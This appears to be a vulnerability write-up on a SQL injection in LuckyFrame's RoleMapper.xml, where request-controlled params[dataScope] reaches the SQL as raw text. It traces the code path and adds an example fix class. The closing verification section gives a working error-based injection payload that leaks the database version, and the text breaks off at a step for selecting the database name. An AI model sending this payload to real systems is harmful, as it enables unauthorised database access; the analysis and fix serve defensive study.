src/main/resources/mybatis/system/RoleMapper.xml
This mapper contains a ${} substitution:
<if test="deptId != null and deptId != 0">
AND (u.dept_id = #{deptId} OR u.dept_id IN ( SELECT t.dept_id FROM sys_dept t WHERE FIND_IN_SET (#{deptId},ancestors) ))
</if>
<!-- Data scope filter -->
${params.dataScope}
</select>
Search for selectUserList to see where this select id is used:

Query user information:
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

Follow the selectUserList method to see its implementation:
src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

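The params in the User object are passed into the mapper and used in the SQL statement. Because dataScope is controllable from the request and ${} inserts it into the statement as raw text instead of binding it as a parameter, the SQL injection vulnerability arises.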
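
One way to close this path, shown as an added example that is not LuckyFrame's code: discard the request-bound params[dataScope] before the mapper runs and rebuild the fragment on the server from typed values only. The class, enum and method names are hypothetical, and the u.dept_id alias and sys_dept table are taken from the mapper above.

```java
import java.util.HashMap;
import java.util.Map;

/** Added example with hypothetical names; not LuckyFrame code. */
public class DataScopeGuard {

    /** Server-side scope kinds (constructed for this example). */
    enum Scope { ALL, OWN_DEPT, OWN_DEPT_AND_CHILDREN }

    static final String KEY = "dataScope";

    /**
     * Copies the request parameters, drops whatever the client bound into
     * params[dataScope], and stores a fragment built from trusted values.
     */
    static Map<String, Object> apply(Map<String, Object> requestParams, Scope scope, long deptId) {
        Map<String, Object> params = new HashMap<>();
        if (requestParams != null) {
            params.putAll(requestParams);
        }
        params.remove(KEY);                    // never forward the client-supplied value
        params.put(KEY, build(scope, deptId)); // the only text ${params.dataScope} will see
        return params;
    }

    /** deptId is a long, so no request text can reach the SQL fragment. */
    static String build(Scope scope, long deptId) {
        switch (scope) {
            case OWN_DEPT:
                return " AND u.dept_id = " + deptId;
            case OWN_DEPT_AND_CHILDREN:
                return " AND (u.dept_id = " + deptId
                     + " OR u.dept_id IN (SELECT t.dept_id FROM sys_dept t"
                     + " WHERE FIND_IN_SET(" + deptId + ", ancestors)))";
            default:
                return ""; // ALL: no extra filter
        }
    }

    public static void main(String[] args) {
        Map<String, Object> fromRequest = new HashMap<>();
        // Constructed input standing in for an untrusted params[dataScope] value
        fromRequest.put(KEY, "and 1=1 /* untrusted text from the request */");
        Map<String, Object> safe = apply(fromRequest, Scope.OWN_DEPT, 103L);
        System.out.println(safe.get(KEY));
    }
}
```

The guard has to run on every code path that reaches a mapper containing ${params.dataScope}, for example in the service layer or an aspect in front of it.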

Verification:
Build the URL and parameters according to the code:
Use error injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name:
